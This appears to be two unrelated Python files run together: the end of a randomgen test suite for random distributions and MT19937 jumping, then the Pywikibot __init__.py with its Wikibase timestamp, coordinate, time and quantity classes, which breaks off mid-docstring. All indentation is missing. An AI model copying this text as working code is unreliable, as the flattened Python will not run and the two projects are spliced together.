gamma = np.ones((3, 1))
relation = 0.5 * np.ones((3, 2))
actual = random.complex_normal(loc=loc, gamma=gamma, relation=relation)
desired = np.array(
[
[
1.393937478212015 - 0.31374589731830593j,
0.9474905694736895 - 0.16424530802218726j,
],
[
1.119247463119766 + 0.023956373851168843j,
0.8776366291514774 + 0.2865220655803411j,
],
[
0.5515508326417458 - 0.15986016780453596j,
-0.6803993941303332 + 1.1782711493556892j,
],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
random.bit_generator.seed(self.seed)
actual = random.complex_normal(loc=loc, gamma=1.0, relation=0.5, size=(3, 2))
assert_array_almost_equal(actual, desired, decimal=15)
def test_multinomial(self):
random.bit_generator.seed(self.seed)
actual = random.multinomial([5, 20], [1 / 6.0] * 6, size=(3, 2))
desired = np.array(
[
[[1, 1, 1, 1, 0, 1], [4, 5, 1, 4, 3, 3]],
[[1, 1, 1, 0, 0, 2], [2, 0, 4, 3, 7, 4]],
[[1, 2, 0, 0, 2, 0], [3, 2, 3, 4, 2, 6]],
],
dtype=np.int64,
)
assert_array_equal(actual, desired)
random.bit_generator.seed(self.seed)
actual = random.multinomial([5, 20], [1 / 6.0] * 6)
desired = np.array([[1, 1, 1, 1, 0, 1], [4, 5, 1, 4, 3, 3]], dtype=np.int64)
assert_array_equal(actual, desired)
class TestThread(object):
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [
Thread(target=function, args=(Generator(MT19937(s, mode="legacy")), o))
for s, o in zip(self.seeds, out1)
]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(Generator(MT19937(s, mode="legacy")), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.0] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput(object):
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (
random.exponential,
random.standard_gamma,
random.chisquare,
random.standard_t,
random.pareto,
random.weibull,
random.power,
random.rayleigh,
random.poisson,
random.zipf,
random.geometric,
random.logseries,
)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (
random.uniform,
random.normal,
random.beta,
random.gamma,
random.f,
random.noncentral_chisquare,
random.vonmises,
random.laplace,
random.gumbel,
random.logistic,
random.lognormal,
random.wald,
random.binomial,
random.negative_binomial,
)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_integers(self, endpoint):
itype = [
bool,
np.int8,
np.uint8,
np.int16,
np.uint16,
np.int32,
np.uint32,
np.int64,
np.uint64,
]
func = random.integers
high = np.array([1])
low = np.array([0])
for dt in itype:
out = func(low, high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low[0], high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low, high[0], endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular, random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
def test_seed_equivalence():
random.seed(0)
state = random.state
random.seed(1)
random.bit_generator.seed(0)
bit_generator_state = random.bit_generator.state
assert_state_equal(state, bit_generator_state)
random.seed(1)
random.state = state
assert_state_equal(state, random.state)
def test_get_state():
state = random.state
get_state = random.__getstate__()
assert state["state"]["pos"] == get_state["state"]["pos"]
assert np.all(state["state"]["key"] == get_state["state"]["key"])
@pytest.mark.skipif(NP_LT_118, reason="Can only test with NumPy >= 1.18")
@pytest.mark.parametrize("config", list(JUMP_TEST_DATA.keys()))
def test_jumped(config):
values = JUMP_TEST_DATA[config]
typ, seed_tpl, step = config
seed = seed_tpl[0] if len(seed_tpl) == 1 else list(seed_tpl)
initial_state = np.random.MT19937(seed).state
mt19937 = MT19937(mode="sequence")
mt19937.state = initial_state
mt19937.random_raw(step)
if typ == "jumped":
jumped = mt19937.jumped()
else:
jumped = mt19937._jump_tester()
key = jumped.state["state"]["key"]
if sys.byteorder == "big":
key = key.byteswap()
md5 = hashlib.md5(key)
assert md5.hexdigest() == values["jumped"]["key_md5"]
assert jumped.state["state"]["pos"] == values["jumped"]["pos"]
def test_broadcast_size_error():
mu = np.ones(3)
sigma = np.ones((4, 3))
size = (10, 4, 2)
assert random.normal(mu, sigma, size=(5, 4, 3)).shape == (5, 4, 3)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=size)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=(1, 3))
with pytest.raises(ValueError):
random.normal(mu, sigma, size=(4, 1, 1))
# 1 arg
shape = np.ones((4, 3))
with pytest.raises(ValueError):
random.standard_gamma(shape, size=size)
with pytest.raises(ValueError):
random.standard_gamma(shape, size=(3,))
with pytest.raises(ValueError):
random.standard_gamma(shape, size=3)
# Check out
out = np.empty(size)
with pytest.raises(ValueError):
random.standard_gamma(shape, out=out)
# 2 arg
with pytest.raises(ValueError):
random.binomial(1, [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], 0.3, size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.multinomial([2, 2], [0.3, 0.7], size=(2, 1))
# 3 arg
a = random.chisquare(5, size=3)
b = random.chisquare(5, size=(4, 3))
c = random.chisquare(5, size=(5, 4, 3))
assert random.noncentral_f(a, b, c).shape == (5, 4, 3)
with pytest.raises(ValueError, match=r"Output size \(6, 5, 1, 1\) is"):
random.noncentral_f(a, b, c, size=(6, 5, 1, 1))
def test_broadcast_size_scalar():
mu = np.ones(3)
sigma = np.ones(3)
random.normal(mu, sigma, size=3)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=2)
|
__init__.py
|
"""The initialization file for the Pywikibot framework."""
#
# (C) Pywikibot team, 2008-2021
#
# Distributed under the terms of the MIT license.
#
import atexit
import datetime
import inspect
import math
import re
import threading
import time
from contextlib import suppress
from decimal import Decimal
from queue import Queue
from typing import Optional, Union
from urllib.parse import urlparse
from warnings import warn
from pywikibot import config as _config
from pywikibot import exceptions
from pywikibot.__metadata__ import (
__copyright__,
__description__,
__download_url__,
__license__,
__maintainer__,
__maintainer_email__,
__name__,
__url__,
__version__,
)
from pywikibot._wbtypes import WbRepresentation as _WbRepresentation
from pywikibot.backports import cache, removesuffix
from pywikibot.bot import (
Bot,
CurrentPageBot,
WikidataBot,
calledModuleName,
handle_args,
input,
input_choice,
input_yn,
show_help,
ui,
)
from pywikibot.diff import PatchManager
from pywikibot.exceptions import (
DEPRECATED_EXCEPTIONS,
CoordinateGlobeUnknownError,
)
from pywikibot.family import AutoFamily, Family
from pywikibot.i18n import translate
from pywikibot.logging import (
critical,
debug,
error,
exception,
log,
output,
stdout,
warning,
)
from pywikibot.site import APISite, BaseSite, ClosedSite, DataSite
from pywikibot.tools import (
ModuleDeprecationWrapper as _ModuleDeprecationWrapper,
)
from pywikibot.tools import classproperty
from pywikibot.tools import deprecate_arg as _deprecate_arg
from pywikibot.tools import normalize_username
from pywikibot.tools.formatter import color_format
__all__ = (
'__copyright__', '__description__', '__download_url__', '__license__',
'__maintainer__', '__maintainer_email__', '__name__',
'__url__', '__version__',
'Bot', 'calledModuleName', 'CaptchaError', 'CascadeLockedPage',
'Category', 'CircularRedirect', 'Claim', 'Coordinate',
'CoordinateGlobeUnknownException', 'critical', 'CurrentPageBot', 'debug',
'EditConflict', 'error', 'Error', 'exception', 'FatalServerError',
'FilePage', 'handle_args', 'html2unicode', 'input', 'input_choice',
'input_yn', 'InterwikiRedirectPage', 'InvalidTitle', 'IsNotRedirectPage',
'IsRedirectPage', 'ItemPage', 'Link', 'LockedNoPage', 'LockedPage', 'log',
'NoCreateError', 'NoMoveTarget', 'NoPage', 'NoUsername',
'NoWikibaseEntity', 'OtherPageSaveError', 'output', 'Page',
'PageCreatedConflict', 'PageDeletedConflict', 'PageRelatedError',
'PageSaveRelatedError', 'PropertyPage', 'SectionError', 'Server414Error',
'Server504Error', 'ServerError', 'showDiff', 'show_help', 'Site',
'SiteDefinitionError', 'SiteLink', 'SpamblacklistError', 'stdout',
'Timestamp', 'TitleblacklistError', 'translate', 'ui', 'unicode2html',
'UnknownExtension', 'UnknownFamily', 'UnknownSite', 'UnsupportedPage',
'UploadWarning', 'url2unicode', 'User', 'warning', 'WbGeoShape',
'WbMonolingualText', 'WbQuantity', 'WbTabularData', 'WbTime', 'WbUnknown',
'WikiBaseError', 'WikidataBot',
)
class Timestamp(datetime.datetime):
"""Class for handling MediaWiki timestamps.
This inherits from datetime.datetime, so it can use all of the methods
and operations of a datetime object. To ensure that the results of any
operation are also a Timestamp object, be sure to use only Timestamp
objects (and datetime.timedeltas) in any operation.
Use Timestamp.fromISOformat() and Timestamp.fromtimestampformat() to
create Timestamp objects from MediaWiki string formats.
As these constructors are typically used to create objects using data
passed provided by site and page methods, some of which return a Timestamp
when previously they returned a MediaWiki string representation, these
methods also accept a Timestamp object, in which case they return a clone.
Use Site.server_time() for the current time; this is more reliable
than using Timestamp.utcnow().
"""
mediawikiTSFormat = '%Y%m%d%H%M%S'
_ISO8601Format_new = '{0:+05d}-{1:02d}-{2:02d}T{3:02d}:{4:02d}:{5:02d}Z'
def clone(self):
"""Clone this instance."""
return self.replace(microsecond=self.microsecond)
@classproperty
def ISO8601Format(cls):
"""ISO8601 format string class property for compatibility purpose."""
return cls._ISO8601Format()
@classmethod
def _ISO8601Format(cls, sep: str = 'T') -> str:
"""ISO8601 format string.
:param sep: one-character separator, placed between the date and time
:return: ISO8601 format string
"""
assert len(sep) == 1
return '%Y-%m-%d{}%H:%M:%SZ'.format(sep)
@classmethod
def fromISOformat(cls, ts, sep: str = 'T'):
"""Convert an ISO 8601 timestamp to a Timestamp object.
:param ts: ISO 8601 timestamp or a Timestamp object already
:type ts: str or Timestamp
:param sep: one-character separator, placed between the date and time
:return: Timestamp object
:rtype: Timestamp
"""
# If inadvertently passed a Timestamp object, use replace()
# to create a clone.
if isinstance(ts, cls):
return ts.clone()
return cls.strptime(ts, cls._ISO8601Format(sep))
@classmethod
def fromtimestampformat(cls, ts):
"""Convert a MediaWiki internal timestamp to a Timestamp object."""
# If inadvertently passed a Timestamp object, use replace()
# to create a clone.
if isinstance(ts, cls):
return ts.clone()
if len(ts) == 8: # year, month and day are given only
ts += '000'
return cls.strptime(ts, cls.mediawikiTSFormat)
def isoformat(self, sep='T'):
"""
Convert object to an ISO 8601 timestamp accepted by MediaWiki.
datetime.datetime.isoformat does not postfix the ISO formatted date
with a 'Z' unless a timezone is included, which causes MediaWiki
~1.19 and earlier to fail.
"""
return self.strftime(self._ISO8601Format(sep))
def totimestampformat(self):
"""Convert object to a MediaWiki internal timestamp."""
return self.strftime(self.mediawikiTSFormat)
def __str__(self):
"""Return a string format recognized by the API."""
return self.isoformat()
def __add__(self, other):
"""Perform addition, returning a Timestamp instead of datetime."""
newdt = super().__add__(other)
if isinstance(newdt, datetime.datetime):
return Timestamp(newdt.year, newdt.month, newdt.day, newdt.hour,
newdt.minute, newdt.second, newdt.microsecond,
newdt.tzinfo)
return newdt
def __sub__(self, other):
"""Perform subtraction, returning a Timestamp instead of datetime."""
newdt = super().__sub__(other)
if isinstance(newdt, datetime.datetime):
return Timestamp(newdt.year, newdt.month, newdt.day, newdt.hour,
newdt.minute, newdt.second, newdt.microsecond,
newdt.tzinfo)
return newdt
class Coordinate(_WbRepresentation):
"""Class for handling and storing Coordinates."""
_items = ('lat', 'lon', 'entity')
@_deprecate_arg('entity', 'globe_item')
def __init__(self, lat: float, lon: float, alt=None,
precision: Optional[float] = None,
globe: Optional[str] = None, typ: str = '',
name: str = '', dim: Optional[int] = None,
site: Optional[DataSite] = None, globe_item=None,
primary: bool = False):
"""
Represent a geo coordinate.
:param lat: Latitude
:param lon: Longitude
:param alt: Altitude? TODO FIXME
:param precision: precision
:param globe: Which globe the point is on
:param typ: The type of coordinate point
:param name: The name
:param dim: Dimension (in meters)
:param site: The Wikibase site
:param globe_item: The Wikibase item for the globe, or the entity URI
of this Wikibase item. Takes precedence over 'globe'
if present.
:type globe_item: pywikibot.ItemPage or str
:param primary: True for a primary set of coordinates
"""
self.lat = lat
self.lon = lon
self.alt = alt
self._precision = precision
self._entity = globe_item
self.type = typ
self.name = name
self._dim = dim
self.site = site or Site().data_repository()
self.primary = primary
if globe:
globe = globe.lower()
elif not globe_item:
globe = self.site.default_globe()
self.globe = globe
@property
def entity(self):
"""Return the entity uri of the globe."""
if not self._entity:
if self.globe not in self.site.globes():
raise CoordinateGlobeUnknownError(
'{} is not supported in Wikibase yet.'
.format(self.globe))
return self.site.globes()[self.globe]
if isinstance(self._entity, ItemPage):
return self._entity.concept_uri()
return self._entity
def toWikibase(self) -> dict:
"""
Export the data to a JSON object for the Wikibase API.
FIXME: Should this be in the DataSite object?
:return: Wikibase JSON
"""
return {'latitude': self.lat,
'longitude': self.lon,
'altitude': self.alt,
'globe': self.entity,
'precision': self.precision,
}
@classmethod
def fromWikibase(cls, data: dict, site: DataSite):
"""
Constructor to create an object from Wikibase's JSON output.
:param data: Wikibase JSON
:param site: The Wikibase site
:rtype: Coordinate
"""
globe = None
if data['globe']:
globes = {}
for name, entity in site.globes().items():
globes[entity] = name
globe = globes.get(data['globe'])
return cls(data['latitude'], data['longitude'],
data['altitude'], data['precision'],
globe, site=site, globe_item=data['globe'])
@property
def precision(self) -> Optional[float]:
"""
Return the precision of the geo coordinate.
The precision is calculated if the Coordinate does not have a
precision, and self._dim is set.
When no precision and no self._dim exists, None is returned.
The biggest error (in degrees) will be given by the longitudinal error;
the same error in meters becomes larger (in degrees) further up north.
We can thus ignore the latitudinal error.
The longitudinal can be derived as follows:
In small angle approximation (and thus in radians):
M{Δλ ≈ Δpos / r_φ}, where r_φ is the radius of earth at the given
latitude.
Δλ is the error in longitude.
M{r_φ = r cos φ}, where r is the radius of earth, φ the latitude
Therefore::
precision = math.degrees(
self._dim/(radius*math.cos(math.radians(self.lat))))
"""
if self._dim is None and self._precision is None:
return None
if self._precision is None and self._dim is not None:
radius = 6378137 # TODO: Support other globes
self._precision = math.degrees(
self._dim / (radius * math.cos(math.radians(self.lat))))
return self._precision
@precision.setter
def precision(self, value):
self._precision = value
def precisionToDim(self) -> Optional[int]:
"""
Convert precision from Wikibase to GeoData's dim and return the latter.
dim is calculated if the Coordinate doesn't have a dimension, and
precision is set. When neither dim nor precision are set, ValueError
is thrown.
Carrying on from the earlier derivation of precision, since
precision = math.degrees(dim/(radius*math.cos(math.radians(self.lat))))
we get::
dim = math.radians(
precision)*radius*math.cos(math.radians(self.lat))
But this is not valid, since it returns a float value for dim which is
an integer. We must round it off to the nearest integer.
Therefore::
dim = int(round(math.radians(
precision)*radius*math.cos(math.radians(self.lat))))
"""
if self._dim is None and self._precision is None:
raise ValueError('No values set for dim or precision')
if self._dim is None and self._precision is not None:
radius = 6378137
self._dim = int(
round(
math.radians(self._precision) * radius * math.cos(
math.radians(self.lat))
)
)
return self._dim
def get_globe_item(self, repo: Optional[DataSite] = None,
lazy_load: bool = False):
"""
Return the ItemPage corresponding to the globe.
Note that the globe need not be in the same data repository as the
Coordinate itself.
A successful lookup is stored as an internal value to avoid the need
for repeated lookups.
:param repo: the Wikibase site for the globe, if different from that
provided with the Coordinate.
:param lazy_load: Do not raise NoPage if ItemPage does not exist.
:return: pywikibot.ItemPage
"""
if isinstance(self._entity, ItemPage):
return self._entity
repo = repo or self.site
return ItemPage.from_entity_uri(repo, self.entity, lazy_load)
class WbTime(_WbRepresentation):
"""A Wikibase time representation."""
PRECISION = {'1000000000': 0,
'100000000': 1,
'10000000': 2,
'1000000': 3,
'100000': 4,
'10000': 5,
'millenia': 6,
'century': 7,
'decade': 8,
'year': 9,
'month': 10,
'day': 11,
'hour': 12,
'minute': 13,
'second': 14
}
FORMATSTR = '{0:+012d}-{1:02d}-{2:02d}T{3:02d}:{4:02d}:{5:02d}Z'
_items = ('year', 'month', 'day', 'hour', 'minute', 'second',
'precision', 'before', 'after', 'timezone', 'calendarmodel')
def __init__(self,
year: Optional[int] = None,
month: Optional[int] = None,
day: Optional[int] = None,
hour: Optional[int] = None,
minute: Optional[int] = None,
second: Optional[int] = None,
precision: Union[int, str, None] = None,
before: int = 0,
after: int = 0,
timezone: int = 0,
calendarmodel: Optional[str] = None,
site: Optional[DataSite] = None):
"""Create a new WbTime object.
The precision can be set by the Wikibase int value (0-14) or by a human
readable string, e.g., 'hour'. If no precision is given, it is set
according to the given time units.
Timezone information is given in three different ways depending on the
time:
* Times after the implementation of UTC (1972): as an offset from UTC
in minutes;
* Times before the implementation of UTC: the offset of the time zone
from universal time;
* Before the implementation of time zones: The longitude of the place
of the event, in the range −180° to 180°, multiplied by 4 to convert
to minutes.
:param year: The year as a signed integer of between 1 and 16 digits.
:param month: Month
:param day: Day
:param hour: Hour
:param minute: Minute
:param second: Second
:param precision: The unit of the precision of the time.
:param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
:param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
:param timezone: Timezone information in minutes.
:param calendarmodel: URI identifying the calendar model
:param site: The Wikibase site
"""
if year is None:
raise ValueError('no year given')
self.precision = self.PRECISION['second']
if second is None:
self.precision = self.PRECISION['minute']
second = 0
if minute is None:
self.precision = self.PRECISION['hour']
minute = 0
if hour is None:
self.precision = self.PRECISION['day']
hour = 0
if day is None:
self.precision = self.PRECISION['month']
day = 1
if month is None:
self.precision = self.PRECISION['year']
month = 1
self.year = year
self.month = month
self.day = day
self.hour = hour
self.minute = minute
self.second = second
self.after = after
self.before = before
self.timezone = timezone
if calendarmodel is None:
if site is None:
site = Site().data_repository()
if site is None:
raise ValueError('Site {} has no data repository'
.format(Site()))
calendarmodel = site.calendarmodel()
self.calendarmodel = calendarmodel
# if precision is given it overwrites the autodetection above
if precision is not None:
if (isinstance(precision, int)
and precision in self.PRECISION.values()):
self.precision = precision
elif precision in self.PRECISION:
self.precision = self.PRECISION[precision]
else:
raise ValueError('Invalid precision: "{}"'.format(precision))
@classmethod
def fromTimestr(cls,
datetimestr: str,
precision: Union[int, str] = 14,
before: int = 0,
after: int = 0,
timezone: int = 0,
calendarmodel: Optional[str] = None,
site: Optional[DataSite] = None):
"""Create a new WbTime object from a UTC date/time string.
The timestamp differs from ISO 8601 in that:
* The year is always signed and having between 1 and 16 digits;
* The month, day and time are zero if they are unknown;
* The Z is discarded since time zone is determined from the timezone
param.
:param datetimestr: Timestamp in a format resembling ISO 8601,
e.g. +2013-01-01T00:00:00Z
:param precision: The unit of the precision of the time.
:param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
:param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
:param timezone: Timezone information in minutes.
:param calendarmodel: URI identifying the calendar model
:param site: The Wikibase site
:rtype: pywikibot.WbTime
"""
match = re.match(r'([-+]?\d+)-(\d+)-(\d+)T(\d+):(\d+):(\d+)Z',
datetimestr)
if not match:
raise ValueError("Invalid format: '{}'".format(datetimestr))
t = match.groups()
return cls(int(t[0]), int(t[1]), int(t[2]),
int(t[3]), int(t[4]), int(t[5]),
precision, before, after, timezone, calendarmodel, site)
@classmethod
def fromTimestamp(cls, timestamp, precision: Union[int, str] = 14,
before: int = 0, after: int = 0,
timezone: int = 0, calendarmodel: Optional[str] = None,
site: Optional[DataSite] = None):
"""
Create a new WbTime object from a pywikibot.Timestamp.
:param timestamp: Timestamp
:type timestamp: pywikibot.Timestamp
:param precision: The unit of the precision of the time.
:param before: Number of units after the given time it could be, if
uncertain. The unit is given by the precision.
:param after: Number of units before the given time it could be, if
uncertain. The unit is given by the precision.
:param timezone: Timezone information in minutes.
:param calendarmodel: URI identifying the calendar model
:param site: The Wikibase site
:rtype: pywikibot.WbTime
"""
return cls.fromTimestr(timestamp.isoformat(), precision=precision,
before=before, after=after,
timezone=timezone, calendarmodel=calendarmodel,
site=site)
def toTimestr(self, force_iso: bool = False) -> str:
"""
Convert the data to a UTC date/time string.
See fromTimestr() for differences between output with and without
force_iso.
:param force_iso: whether the output should be forced to ISO 8601
:return: Timestamp in a format resembling ISO 8601
"""
if force_iso:
return Timestamp._ISO8601Format_new.format(
self.year, max(1, self.month), max(1, self.day),
self.hour, self.minute, self.second)
return self.FORMATSTR.format(self.year, self.month, self.day,
self.hour, self.minute, self.second)
def toTimestamp(self) -> Timestamp:
"""
Convert the data to a pywikibot.Timestamp.
:raises ValueError: instance value cannot be represented using
Timestamp
"""
if self.year <= 0:
raise ValueError('You cannot turn BC dates into a Timestamp')
return Timestamp.fromISOformat(
self.toTimestr(force_iso=True).lstrip('+'))
def toWikibase(self) -> dict:
"""
Convert the data to a JSON object for the Wikibase API.
:return: Wikibase JSON
"""
json = {'time': self.toTimestr(),
'precision': self.precision,
'after': self.after,
'before': self.before,
'timezone': self.timezone,
'calendarmodel': self.calendarmodel
}
return json
@classmethod
def fromWikibase(cls, wb: dict, site: Optional[DataSite] = None):
"""
Create a WbTime from the JSON data given by the Wikibase API.
:param wb: Wikibase JSON
:param site: The Wikibase site
:rtype: pywikibot.WbTime
"""
return cls.fromTimestr(wb['time'], wb['precision'],
wb['before'], wb['after'],
wb['timezone'], wb['calendarmodel'], site)
class WbQuantity(_WbRepresentation):
"""A Wikibase quantity representation."""
_items = ('amount', 'upperBound', 'lowerBound', 'unit')
@staticmethod
def _require_errors(site: DataSite) -> bool:
"""
Check if Wikibase site is so old it requires error bounds to be given.
If no site item is supplied it raises a warning and returns True.
:param site: The Wikibase site
"""
if not site:
warning(
"WbQuantity now expects a 'site' parameter. This is needed to "
'ensure correct handling of error bounds.')
return False
return site.mw_version < '1.29.0-wmf.2'
@staticmethod
def _todecimal(value: str) -> Optional[Decimal]:
"""
Convert a string to a Decimal for use in WbQuantity.
None value is returned as is.
:param value: decimal number to convert
"""
if isinstance(value, Decimal):
return value
if value is None:
return None
return Decimal(str(value))
@staticmethod
def _fromdecimal(value: Decimal) -> Optional[str]:
"""
Convert a Decimal to a string representation suitable for WikiBase.
None value is returned as is.
:param value: decimal number to convert
"""
if value is None:
return None
return format(value, '+g')
def __init__(self, amount, unit=None, error=None,
site: Optional[DataSite] = None):
"""
Create a new WbQuantity object.
:param amount: number representing this quantity
:type amount: str or Decimal. Other types are accepted, and
converted via str to Decimal.
:param unit: the Wikibase item for the unit or the entity URI of this
Wikibase item.
:type unit: pywikibot.ItemPage, str or None
:param error: the uncertainty of the amount (e.g. ±1)
:type error: same as amount, or tuple of two values, where the first
value is the upper error and the second is the lower error value.
:param site: The Wikibase site
"""
if amount is None:
raise ValueError('no amount given')
self.amount = self._todecimal(amount)
self._unit = unit
self.site = site or Site().data_repository()
# also allow entity URIs to be provided via unit parameter
if isinstance(unit, str) \
and unit.partition('://')[0] not in ('http', 'https'):
raise ValueError("'unit' must be an ItemPage or entity uri.")
if error is None and not self._require_errors(site):
self.upperBound = self.lowerBound = None
else:
if error is None:
upperError = lowerError = Decimal(0)
elif isinstance(error, tuple):
upperError = self._todecimal(error[0])
lowerError = self._todecimal(error[1])
else:
upperError = lowerError = self._todecimal(error)
self.upperBound = self.amount + upperError
self.lowerBound = self.amount - lowerError
@property
def unit(self):
"""Return _unit's entity uri or '1' if _unit is None."""
if isinstance(self._unit, ItemPage):
return self._unit.concept_uri()
return self._unit or '1'
def get_unit_item(self, repo: Optional[DataSite] = None,
lazy_load: bool = False):
"""
Return the ItemPage corresponding to the unit.
Note that the unit need not be in the same data repository as the
WbQuantity itself.
A successful lookup is stored as an internal value to avoid the need
for repeated lookups.
:param repo: the Wikibase site for the unit, if different from that
provided with the WbQuantity.
:param lazy_load: Do not raise NoPage if ItemPage does not exist.
:return: pywikibot.ItemPage
"""
if not isinstance(self._unit, str):
return self._unit
repo = repo or self.site
self._unit = ItemPage.from_entity_uri(repo, self._unit, lazy_load)
return self._unit
def toWikibase(self) -> dict:
"""
Convert the data to a JSON object for the Wikibase API.
:return: Wikibase JSON
"""
json = {'amount': self._fromdecimal(self.amount),
'upperBound': self._fromdecimal(self.upperBound),
'lowerBound': self._fromdecimal(self.lowerBound),
'unit': self.unit
}
return json
@classmethod
def fromWikibase(cls, wb: dict, site: Optional[DataSite] = None):
"""
Create a WbQuantity from the JSON data given by the Wikibase API.
:param wb: Wikibase JSON
:param site: The Wikibase site
:rtype: pywikibot.WbQuantity
"""
amount = cls._todecimal(wb['amount'])
upperBound = cls._todecimal(wb.get('upperBound'))
lowerBound = cls._todecimal(wb.get('lowerBound'))
bounds_provided = (upperBound is not None and lowerBound is not None)
error = None
if bounds_provided or cls._require_errors(site):
error = (upperBound - amount, amount - lowerBound)
if wb['unit'] == '1':
unit = None
else:
unit = wb['unit']
return cls(amount, unit, error, site)
class WbMonolingualText(_WbRepresentation):
"""A Wikibase monolingual text representation."""
_items = ('text', 'language')
def __init__(self, text: str, language: str):
"""
Create a new WbMonolingualText object.
:param text: text string
:param language: language code of the string
"""
if not text or not language:
raise ValueError('text and language cannot be empty')
self.text = text
self.language = language
def toWikibase(self) -> dict:
"""
Convert the data to a JSON object for the Wikibase API.
:return: Wikibase JSON
"""
json = {'text': self.text,
'language': self.language
}
return json
@classmethod
def fromWikibase(cls, wb: dict):
"""
Create a WbMonolingualText from the JSON data given by Wikibase API.
:param wb: Wikibase JSON
:rtype: pywikibot.WbMonolingualText
"""
return cls(wb['text'], wb['language'])
class _WbDataPage(_WbRepresentation):
"""
A Wikibase representation for data pages.
A temporary implementation until T162336 has been resolved.
Note that this class cannot be used directly
"""
_items = ('page', )
@classmethod
def _get_data_site(cls, repo_site: DataSite) -> APISite:
"""
Return the site serving as a repository for a given data type.
Must be implemented in the extended class.
:param repo_site: The Wikibase site
"""
raise NotImplementedError
@classmethod
def _get_type_specifics(cls, site: DataSite) -> dict:
"""
Return the specifics for a given data type.
Must be implemented in the extended class.
The dict should have three keys:
* ending: str, required filetype-like ending in page titles.
* label: str, describing the data type for use in error messages.
* data_site: APISite, site serving as a repository for
the given data type.
:param site: The Wikibase site
"""
raise NotImplementedError
@staticmethod
def _validate(page, data_site, ending: str, label: str):
"""
Validate the provided page against general and type specific rules.
:param page: Page containing the data.
:type page: pywikibot.Page
:param data_site: The site serving as a repository for the given
data type.
:type data_site: APISite
:param ending: Required filetype-like ending in page titles.
E.g. '.map'
:param label: Label describing the data type in error messages.
"""
if not isinstance(page, Page):
raise ValueError(
'Page {} must be a pywikibot.Page object not a {}.'
.format(page, type(page)))
# validate page exists
if not page.exists():
raise ValueError('Page {} must exist.'.format(page))
# validate page is on the right site, and that site supports the type
if not data_site:
raise ValueError(
'The provided site does not support {}.'.format(label))
if page.site != data_site:
raise ValueError(
'Page must be on the {} repository site.'.format(label))
# validate page title fulfills hard-coded Wikibase requirement
# pcre regexp: '/^Data:[^\\[\\]#\\\:{|}]+\.map$/u' for geo-shape
# pcre regexp: '/^Data:[^\\[\\]#\\\:{|}]+\.tab$/u' for tabular-data
# As we have already checked for existence the following simplified
# check should be enough.
if not page.title().startswith('Data:') \
or not page.title().endswith(ending):
raise ValueError(
"Page must be in 'Data:' namespace and end in '{}' "
'for {}.'.format(ending, label))
def __init__(self, page, site: Optional[DataSite] = None):
"""
Create a new _WbDataPage object.
:param page: page containing the data
:type page: pywikibot.Page
:param site: The Wikibase site
"""
site = site or Site().data_repository()
specifics = type(self)._get_type_specifics(site)
_WbDataPage._validate(page, specifics['data_site'],
specifics['ending'], specifics['label'])
self.page = page
def __hash__(self):
"""Override super.hash() as toWikibase is a string for _WbDataPage."""
return hash(self.toWikibase())
def toWikibase(self) -> str:
"""
Convert the data to the value required by the Wikibase API.
:return: title of the data page incl. namespace
"""
return self.page.title()
@classmethod
def fromWikibase(cls, page_name: str, site: DataSite):
"""
Create a _WbDataPage from the JSON data given by the Wikibase API.
:param page_name: page name from Wikibase value
:param site: The Wikibase site
:rtype: pywikibot._WbDataPage
"""
data_site = cls._get_data_site(site)
page = Page(data_site, page_name)
return cls(page, site)
class WbGeoShape(_WbDataPage):
"""A Wikibase geo-shape representation."""
@classmethod
def _get_data_site(cls, site: DataSite) -> APISite:
"""
Return the site serving as a geo-shape repository.
:param site: The Wikibase site
"""
return site.geo_shape_repository()
@classmethod
def _get_type_specifics(cls, site: DataSite) -> dict:
"""
Return the specifics for WbGeoShape.
